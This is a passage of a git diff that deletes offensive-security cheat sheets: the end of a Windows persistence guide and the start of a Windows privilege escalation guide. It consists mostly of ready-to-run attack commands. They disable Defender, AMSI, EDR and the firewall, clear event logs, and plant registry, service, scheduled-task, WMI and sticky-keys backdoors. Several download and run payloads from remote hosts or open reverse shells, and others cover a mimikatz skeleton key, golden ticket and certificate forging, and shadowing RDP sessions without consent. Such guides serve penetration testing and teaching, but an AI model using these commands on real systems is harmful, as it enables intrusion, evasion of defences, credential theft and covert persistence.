protection on Cortex XDR files, processes, registry and services - cytool.exe protect disable - - # Disables Cortex XDR (Even with tamper protection enabled) - cytool.exe runtime disable - - # Disables event collection - cytool.exe event_collection disable - ``` - -### Disable Windows Defender - -```powershell -# Disable Defender -sc config WinDefend start= disabled -sc stop WinDefend -Set-MpPreference -DisableRealtimeMonitoring $true - -## Exclude a process / location -Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe" -Add-MpPreference -ExclusionProcess 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -Add-MpPreference -ExclusionPath C:\Video, C:\install - -# Disable scanning all downloaded files and attachments, disable AMSI (reactive) -PS C:\> Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus -PS C:\> Set-MpPreference -DisableIOAVProtection $true -# Disable AMSI (set to 0 to enable) -PS C:\> Set-MpPreference -DisableScriptScanning 1 - -# Blind ETW Windows Defender: zero out registry values corresponding to its ETW sessions -reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f - -# Wipe currently stored definitions -# Location of MpCmdRun.exe: C:\ProgramData\Microsoft\Windows Defender\Platform\ -MpCmdRun.exe -RemoveDefinitions -All - -# Remove signatures (if Internet connection is present, they will be downloaded again): -PS > & "C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe" -RemoveDefinitions -All -PS > & "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All - -# Disable Windows Defender Security Center -reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f - -# Disable Real Time Protection -reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f -reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f -reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f -``` - - -### Disable Windows Firewall - -```powershell -Netsh Advfirewall show allprofiles -NetSh Advfirewall set allprofiles state off - -# ip whitelisting -New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress ATTACKER_IP -``` - -### Clear System and Security Logs - -```powershell -cmd.exe /c wevtutil.exe cl System -cmd.exe /c wevtutil.exe cl Security -``` - -## Simple User - -Set a file as hidden - -```powershell -attrib +h c:\autoexec.bat -``` - -### Registry HKCU - -Create a REG_SZ value in the Run key within HKCU\Software\Microsoft\Windows. - -```powershell -Value name: Backdoor -Value data: C:\Users\Rasta\AppData\Local\Temp\backdoor.exe -``` - -Using the command line - -```powershell -reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe" -reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe" -reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe" -reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Evil /t REG_SZ /d "C:\Users\user\backdoor.exe" -``` - -Using SharPersist - -```powershell -SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add -SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add -o env -SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "logonscript" -m add -``` - -### Startup - -Create a batch script in the user startup folder. - -```powershell -PS C:\> gc C:\Users\Rasta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.bat -start /b C:\Users\Rasta\AppData\Local\Temp\backdoor.exe -``` - -Using SharPersist - -```powershell -SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add -``` - -### Scheduled Tasks User - -* Using native **schtask** - Create a new task - ```powershell - # Create the scheduled tasks to run once at 00.00 - schtasks /create /sc ONCE /st 00:00 /tn "Device-Synchronize" /tr C:\Temp\revshell.exe - # Force run it now ! - schtasks /run /tn "Device-Synchronize" - ``` -* Using native **schtask** - Leverage the `schtasks /change` command to modify existing scheduled tasks - ```powershell - # Launch an executable by calling the ShellExec_RunDLL function. - SCHTASKS /Change /tn "\Microsoft\Windows\PLA\Server Manager Performance Monitor" /TR "C:\windows\system32\rundll32.exe SHELL32.DLL,ShellExec_RunDLLA C:\windows\system32\msiexec.exe /Z c:\programdata\S-1-5-18.dat" /RL HIGHEST /RU "" /ENABLE - ``` - -* Using Powershell - ```powershell - PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe" - PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta" - PS C:\> $P = New-ScheduledTaskPrincipal "Rasta" - PS C:\> $S = New-ScheduledTaskSettingsSet - PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S - PS C:\> Register-ScheduledTask Backdoor -InputObject $D - ``` - -* Using SharPersist - ```powershell - # Add to a current scheduled task - SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add - - # Add new task - SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add - SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly - ``` - - -### BITS Jobs - -```powershell -bitsadmin /create backdoor -bitsadmin /addfile backdoor "http://10.10.10.10/evil.exe" "C:\tmp\evil.exe" - -# v1 -bitsadmin /SetNotifyCmdLine backdoor C:\tmp\evil.exe NUL -bitsadmin /SetMinRetryDelay "backdoor" 60 -bitsadmin /resume backdoor - -# v2 - exploit/multi/script/web_delivery -bitsadmin /SetNotifyCmdLine backdoor regsvr32.exe "/s /n /u /i:http://10.10.10.10:8080/FHXSd9.sct scrobj.dll" -bitsadmin /resume backdoor -``` - -## Serviceland - -### IIS - -IIS Raid – Backdooring IIS Using Native Modules - -```powershell -$ git clone https://github.com/0x09AL/IIS-Raid -$ python iis_controller.py --url http://192.168.1.11/ --password SIMPLEPASS -C:\Windows\system32\inetsrv\APPCMD.EXE install module /name:Module Name /image:"%windir%\System32\inetsrv\IIS-Backdoor.dll" /add:true -``` - -### Windows Service - -Using SharPersist - -```powershell -SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Service" -m add -``` - -## Elevated - -### Registry HKLM - -Similar to HKCU. Create a REG_SZ value in the Run key within HKLM\Software\Microsoft\Windows. - -```powershell -Value name: Backdoor -Value data: C:\Windows\Temp\backdoor.exe -``` - -Using the command line - -```powershell -reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Evil /t REG_SZ /d "C:\tmp\backdoor.exe" -reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Evil /t REG_SZ /d "C:\tmp\backdoor.exe" -reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Evil /t REG_SZ /d "C:\tmp\backdoor.exe" -reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Evil /t REG_SZ /d "C:\tmp\backdoor.exe" -``` - -#### Winlogon Helper DLL - -> Run executable during Windows logon - -```powershell -msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe > evilbinary.exe -msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f dll > evilbinary.dll - -reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, evilbinary.exe" /f -reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /d "explorer.exe, evilbinary.exe" /f -Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, evilbinary.exe" -Force -Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, evilbinary.exe" -Force -``` - - -#### GlobalFlag - -> Run executable after notepad is killed - -```powershell -reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512 -reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1 -reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\temp\evil.exe" -``` - -### Startup Elevated - -Create a batch script in the user startup folder. - -```powershell -C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp -``` - -### Services Elevated - -Create a service that will start automatically or on-demand. - -```powershell -# Powershell -New-Service -Name "Backdoor" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -Description "Nothing to see here." -StartupType Automatic -sc start pentestlab - -# SharPersist -SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c backdoor.exe" -n "Backdoor" -m add - -# sc -sc create Backdoor binpath= "cmd.exe /k C:\temp\backdoor.exe" start="auto" obj="LocalSystem" -sc start Backdoor -``` - -### Scheduled Tasks Elevated - -Scheduled Task to run as SYSTEM, everyday at 9am or on a specific day. - -> Processes spawned as scheduled tasks have taskeng.exe process as their parent - -```powershell -# Powershell -$A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\temp\backdoor.exe" -$T = New-ScheduledTaskTrigger -Daily -At 9am -# OR -$T = New-ScheduledTaskTrigger -Daily -At "9/30/2020 11:05:00 AM" -$P = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest -$S = New-ScheduledTaskSettingsSet -$D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S -Register-ScheduledTask "Backdoor" -InputObject $D - -# Native schtasks -schtasks /create /sc minute /mo 1 /tn "eviltask" /tr C:\tools\shell.cmd /ru "SYSTEM" -schtasks /create /sc minute /mo 1 /tn "eviltask" /tr calc /ru "SYSTEM" /s dc-mantvydas /u user /p password -schtasks /Create /RU "NT AUTHORITY\SYSTEM" /tn [TaskName] /tr "regsvr32.exe -s \"C:\Users\*\AppData\Local\Temp\[payload].dll\"" /SC ONCE /Z /ST [Time] /ET [Time] - -##(X86) - On User Login -schtasks /create /tn OfficeUpdaterA /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://192.168.95.195:8080/kBBldxiub6'''))'" /sc onlogon /ru System - -##(X86) - On System Start -schtasks /create /tn OfficeUpdaterB /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://192.168.95.195:8080/kBBldxiub6'''))'" /sc onstart /ru System - -##(X86) - On User Idle (30mins) -schtasks /create /tn OfficeUpdaterC /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://192.168.95.195:8080/kBBldxiub6'''))'" /sc onidle /i 30 - -##(X64) - On User Login -schtasks /create /tn OfficeUpdaterA /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://192.168.95.195:8080/kBBldxiub6'''))'" /sc onlogon /ru System - -##(X64) - On System Start -schtasks /create /tn OfficeUpdaterB /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://192.168.95.195:8080/kBBldxiub6'''))'" /sc onstart /ru System - -##(X64) - On User Idle (30mins) -schtasks /create /tn OfficeUpdaterC /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://192.168.95.195:8080/kBBldxiub6'''))'" /sc onidle /i 30 -``` - - -### Windows Management Instrumentation Event Subscription - -> An adversary can use Windows Management Instrumentation (WMI) to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. - - -* **__EventFilter**: Trigger (new process, failed logon etc.) -* **EventConsumer**: Perform Action (execute payload etc.) -* **__FilterToConsumerBinding**: Binds Filter and Consumer Classes - -```ps1 -# Using CMD : Execute a binary 60 seconds after Windows started -wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="WMIPersist", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'" -wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="WMIPersist", ExecutablePath="C:\Windows\System32\binary.exe",CommandLineTemplate="C:\Windows\System32\binary.exe" -wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"WMIPersist\"", Consumer="CommandLineEventConsumer.Name=\"WMIPersist\"" -# Remove it -Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='WMIPersist'" | Remove-WmiObject -Verbose - -# Using Powershell (deploy) -$FilterArgs = @{name='WMIPersist'; EventNameSpace='root\CimV2'; QueryLanguage="WQL"; Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 60 AND TargetInstance.SystemUpTime < 90"}; -$Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs -$ConsumerArgs = @{name='WMIPersist'; CommandLineTemplate="$($Env:SystemRoot)\System32\binary.exe";} -$Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs -$FilterToConsumerArgs = @{Filter = [Ref] $Filter; Consumer = [Ref] $Consumer;} -$FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs -# Using Powershell (remove) -$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'WMIPersist'" -$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'WMIPersist'" -$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -$FilterConsumerBindingToCleanup | Remove-WmiObject -$EventConsumerToCleanup | Remove-WmiObject -$EventFilterToCleanup | Remove-WmiObject -``` - - -### Binary Replacement - -#### Binary Replacement on Windows XP+ - -| Feature | Executable | -|---------------------|---------------------------------------| -| Sticky Keys | C:\Windows\System32\sethc.exe | -| Accessibility Menu | C:\Windows\System32\utilman.exe | -| On-Screen Keyboard | C:\Windows\System32\osk.exe | -| Magnifier | C:\Windows\System32\Magnify.exe | -| Narrator | C:\Windows\System32\Narrator.exe | -| Display Switcher | C:\Windows\System32\DisplaySwitch.exe | -| App Switcher | C:\Windows\System32\AtBroker.exe | - -In Metasploit : `use post/windows/manage/sticky_keys` - -#### Binary Replacement on Windows 10+ - -Exploit a DLL hijacking vulnerability in the On-Screen Keyboard **osk.exe** executable. - -Create a malicious **HID.dll** in `C:\Program Files\Common Files\microsoft shared\ink\HID.dll`. - - -### RDP Backdoor - -#### utilman.exe - -At the login screen, press Windows Key+U, and you get a cmd.exe window as SYSTEM. - -```powershell -REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f -``` - -#### sethc.exe - -Hit F5 a bunch of times when you are at the RDP login screen. - -```powershell -REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f -``` - -### Remote Desktop Services Shadowing - -:warning: FreeRDP and rdesktop don't support Remote Desktop Services Shadowing feature. - -Requirements: -* RDP must be running - -```powershell -reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v Shadow /t REG_DWORD /d 4 -# 4 – View Session without user’s permission. - -# Allowing remote connections to this computer -reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f - - -# Disable UAC remote restriction -reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f - -mstsc /v:{ADDRESS} /shadow:{SESSION_ID} /noconsentprompt /prompt -# /v parameter lets specify the {ADDRESS} value that is an IP address or a hostname of a remote host; -# /shadow parameter is used to specify the {SESSION_ID} value that is a shadowee’s session ID; -# /noconsentprompt parameter allows to bypass a shadowee’s permission and shadow their session without their consent; -# /prompt parameter is used to specify a user’s credentials to connect to a remote host. -``` - -### Skeleton Key - -> Inject a master password into the LSASS process of a Domain Controller. - -Requirements: -* Domain Administrator (SeDebugPrivilege) or `NTAUTHORITY\SYSTEM` - -```powershell -# Execute the skeleton key attack -mimikatz "privilege::debug" "misc::skeleton" -Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName - -# Access using the password "mimikatz" -Enter-PSSession -ComputerName -Credential \Administrator -``` - - -### Virtual Machines - -> Based on the Shadow Bunny technique. - -```ps1 -# download virtualbox -Invoke-WebRequest "https://download.virtualbox.org/virtualbox/6.1.8/VirtualBox-6.1.8-137981-Win.exe" -OutFile $env:TEMP\VirtualBox-6.1.8-137981-Win.exe - -# perform a silent install and avoid creating desktop and quick launch icons -VirtualBox-6.0.14-133895-Win.exe --silent --ignore-reboot --msiparams VBOX_INSTALLDESKTOPSHORTCUT=0,VBOX_INSTALLQUICKLAUNCHSHORTCUT=0 - -# in \Program Files\Oracle\VirtualBox\VBoxManage.exe -# Disabling notifications -.\VBoxManage.exe setextradata global GUI/SuppressMessages "all" - -# Download the Virtual machine disk -Copy-Item \\smbserver\images\shadowbunny.vhd $env:USERPROFILE\VirtualBox\IT Recovery\shadowbunny.vhd - -# Create a new VM -$vmname = "IT Recovery" -.\VBoxManage.exe createvm --name $vmname --ostype "Ubuntu" --register - -# Add a network card in NAT mode -.\VBoxManage.exe modifyvm $vmname --ioapic on # required for 64bit -.\VBoxManage.exe modifyvm $vmname --memory 1024 --vram 128 -.\VBoxManage.exe modifyvm $vmname --nic1 nat -.\VBoxManage.exe modifyvm $vmname --audio none -.\VBoxManage.exe modifyvm $vmname --graphicscontroller vmsvga -.\VBoxManage.exe modifyvm $vmname --description "Shadowbunny" - -# Mount the VHD file -.\VBoxManage.exe storagectl $vmname -name "SATA Controller" -add sata -.\VBoxManage.exe storageattach $vmname -comment "Shadowbunny Disk" -storagectl "SATA Controller" -type hdd -medium "$env:USERPROFILE\VirtualBox VMs\IT Recovery\shadowbunny.vhd" -port 0 - -# Start the VM -.\VBoxManage.exe startvm $vmname –type headless - - -# optional - adding a shared folder -# require: VirtualBox Guest Additions -.\VBoxManage.exe sharedfolder add $vmname -name shadow_c -hostpath c:\ -automount -# then mount the folder in the VM -sudo mkdir /mnt/c -sudo mount -t vboxsf shadow_c /mnt/c -``` - -### Windows Subsystem for Linux - -```ps1 -# List and install online packages -wsl --list --online -wsl --install -d kali-linux - -# Use a local package -wsl --set-default-version 2 -curl.exe --insecure -L -o debian.appx https://aka.ms/wsl-debian-gnulinux -Add-AppxPackage .\debian.appx - -# Run the machine as root -wsl kali-linux --user root -``` - - -## Domain - -### User Certificate - -```ps1 -# Request a certificate for the User template -.\Certify.exe request /ca:CA01.megacorp.local\CA01 /template:User - -# Convert the certificate for Rubeus -openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx - -# Request a TGT using the certificate -.\Rubeus.exe asktgt /user:username /certificate:C:\Temp\cert.pfx /password:Passw0rd123! -``` - -### Golden Certificate - -> Require elevated privileges in the Active Directory, or on the ADCS machine - -* Export CA as p12 file: `certsrv.msc` > `Right Click` > `Back up CA...` -* Alternative 1: Using Mimikatz you can extract the certificate as PFX/DER - ```ps1 - privilege::debug - crypto::capi - crypto::cng - crypto::certificates /systemstore:local_machine /store:my /export - ``` -* Alternative 2: Using SharpDPAPI, then convert the certificate: `openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx` -* [ForgeCert](https://github.com/GhostPack/ForgeCert) - Forge a certificate for any active domain user using the CA certificate - ```ps1 - ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword Password123 --Subject CN=User --SubjectAltName harry@lab.local --NewCertPath harry.pfx --NewCertPassword Password123 - ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword Password123 --Subject CN=User --SubjectAltName DC$@lab.local --NewCertPath dc.pfx --NewCertPassword Password123 - ``` -* Finally you can request a TGT using the Certificate - ```ps1 - Rubeus.exe asktgt /user:ron /certificate:harry.pfx /password:Password123 - ``` - -### Golden Ticket - -> Forge a Golden ticket using Mimikatz - -```ps1 -kerberos::purge -kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /ticket:evil.tck /ptt -kerberos::tgt -``` - -### LAPS Persistence - -To prevent a machine to update its LAPS password, it is possible to set the update date in the futur. - -```ps1 -Set-DomainObject -Identity -Set @{"ms-mcs-admpwdexpirationtime"="232609935231523081"} -``` - -## References - -* [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md) -* [SharPersist Windows Persistence Toolkit in C - Brett Hawkins](http://www.youtube.com/watch?v=K7o9RSVyazo) -* [IIS Raid – Backdooring IIS Using Native Modules - 19/02/2020](https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/) -* [Old Tricks Are Always Useful: Exploiting Arbitrary File Writes with Accessibility Tools - Apr 27, 2020 - @phraaaaaaa](https://iwantmore.pizza/posts/arbitrary-write-accessibility-tools.html) -* [Persistence - Checklist - @netbiosX](https://github.com/netbiosX/Checklists/blob/master/Persistence.md) -* [Persistence – Winlogon Helper DLL - @netbiosX](https://pentestlab.blog/2020/01/14/persistence-winlogon-helper-dll/) -* [Persistence - BITS Jobs - @netbiosX](https://pentestlab.blog/2019/10/30/persistence-bits-jobs/) -* [Persistence – Image File Execution Options Injection - @netbiosX](https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/) -* [Persistence – Registry Run Keys - @netbiosX](https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/) -* [Golden Certificate - NOVEMBER 15, 2021](https://pentestlab.blog/2021/11/15/golden-certificate/) -* [Beware of the Shadowbunny - Using virtual machines to persist and evade detections - Sep 23, 2020 - wunderwuzzi](https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/) -* [Persistence via WMI Event Subscription - Elastic Security Solution](https://www.elastic.co/guide/en/security/current/persistence-via-wmi-event-subscription.html) \ No newline at end of file diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md deleted file mode 100644 index e58e5e6..0000000 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ /dev/null @@ -1,1443 +0,0 @@ -# Windows - Privilege Escalation - -## Summary - -* [Tools](#tools) -* [Windows Version and Configuration](#windows-version-and-configuration) -* [User Enumeration](#user-enumeration) -* [Network Enumeration](#network-enumeration) -* [Antivirus Enumeration](#antivirus-enumeration) -* [Default Writeable Folders](#default-writeable-folders) -* [EoP - Looting for passwords](#eop---looting-for-passwords) - * [SAM and SYSTEM files](#sam-and-system-files) - * [HiveNightmare](#hivenightmare) - * [LAPS Settings](#laps-settings) - * [Search for file contents](#search-for-file-contents) - * [Search for a file with a certain filename](#search-for-a-file-with-a-certain-filename) - * [Search the registry for key names and passwords](#search-the-registry-for-key-names-and-passwords) - * [Passwords in unattend.xml](#passwords-in-unattendxml) - * [Wifi passwords](#wifi-passwords) - * [Sticky Notes passwords](#sticky-notes-passwords) - * [Passwords stored in services](#passwords-stored-in-services) - * [Passwords stored in Key Manager](#passwords-stored-in-key-manager) - * [Powershell History](#powershell-history) - * [Powershell Transcript](#powershell-transcript) - * [Password in Alternate Data Stream](#password-in-alternate-data-stream) -* [EoP - Processes Enumeration and Tasks](#eop---processes-enumeration-and-tasks) -* [EoP - Incorrect permissions in services](#eop---incorrect-permissions-in-services) -* [EoP - Windows Subsystem for Linux (WSL)](#eop---windows-subsystem-for-linux-wsl) -* [EoP - Unquoted Service Paths](#eop---unquoted-service-paths) -* [EoP - $PATH Interception](#eop---path-interception) -* [EoP - Named Pipes](#eop---named-pipes) -* [EoP - Kernel Exploitation](#eop---kernel-exploitation) -* [EoP - AlwaysInstallElevated](#eop---alwaysinstallelevated) -* [EoP - Insecure GUI apps](#eop---insecure-gui-apps) -* [EoP - Evaluating Vulnerable Drivers](#eop---evaluating-vulnerable-drivers) -* [EoP - Printers](#eop---printers) - * [Universal Printer](#universal-printer) - * [Bring Your Own Vulnerability](#bring-your-own-vulnerability) -* [EoP - Runas](#eop---runas) -* [EoP - Abusing Shadow Copies](#eop---abusing-shadow-copies) -* [EoP - From local administrator to NT SYSTEM](#eop---from-local-administrator-to-nt-system) -* [EoP - Living Off The Land Binaries and Scripts](#eop---living-off-the-land-binaries-and-scripts) -* [EoP - Impersonation Privileges](#eop---impersonation-privileges) - * [Restore A Service Account's Privileges](#restore-a-service-accounts-privileges) - * [Meterpreter getsystem and alternatives](#meterpreter-getsystem-and-alternatives) - * [RottenPotato (Token Impersonation)](#rottenpotato-token-impersonation) - * [Juicy Potato (Abusing the golden privileges)](#juicy-potato-abusing-the-golden-privileges) - * [Rogue Potato (Fake OXID Resolver)](#rogue-potato-fake-oxid-resolver)) - * [EFSPotato (MS-EFSR EfsRpcOpenFileRaw)](#efspotato-ms-efsr-efsrpcopenfileraw)) -* [EoP - Privileged File Write](#eop---privileged-file-write) - * [DiagHub](#diaghub) - * [UsoDLLLoader](#usodllloader) - * [WerTrigger](#wertrigger) - * [WerMgr](#wermgr) -* [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposure) - * [MS08-067 (NetAPI)](#ms08-067-netapi) - * [MS10-015 (KiTrap0D)](#ms10-015-kitrap0d---microsoft-windows-nt2000--2003--2008--xp--vista--7) - * [MS11-080 (adf.sys)](#ms11-080-afd.sys---microsoft-windows-xp-2003) - * [MS15-051 (Client Copy Image)](#ms15-051---microsoft-windows-2003--2008--7--8--2012) - * [MS16-032](#ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64) - * [MS17-010 (Eternal Blue)](#ms17-010-eternal-blue) - * [CVE-2019-1388](#cve-2019-1388) -* [EoP - $PATH Interception](#eop---path-interception) -* [References](#references) - -## Tools - -- [PowerSploit's PowerUp](https://github.com/PowerShellMafia/PowerSploit) - ```powershell - powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks - ``` -- [Watson - Watson is a (.NET 2.0 compliant) C# implementation of Sherlock](https://github.com/rasta-mouse/Watson) -- [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities](https://github.com/rasta-mouse/Sherlock) - ```powershell - powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File Sherlock.ps1 - ``` -- [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot) -- [Windows-Exploit-Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester) - ```powershell - ./windows-exploit-suggester.py --update - ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt - ``` -- [windows-privesc-check - Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems](https://github.com/pentestmonkey/windows-privesc-check) -- [WindowsExploits - Windows exploits, mostly precompiled. Not being updated.](https://github.com/abatchy17/WindowsExploits) -- [WindowsEnum - A Powershell Privilege Escalation Enumeration Script.](https://github.com/absolomb/WindowsEnum) -- [Seatbelt - A C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.](https://github.com/GhostPack/Seatbelt) - ```powershell - Seatbelt.exe -group=all -full - Seatbelt.exe -group=system -outputfile="C:\Temp\system.txt" - Seatbelt.exe -group=remote -computername=dc.theshire.local -computername=192.168.230.209 -username=THESHIRE\sam -password="yum \"po-ta-toes\"" - ``` -- [Powerless - Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mind](https://github.com/M4ximuss/Powerless) -- [JAWS 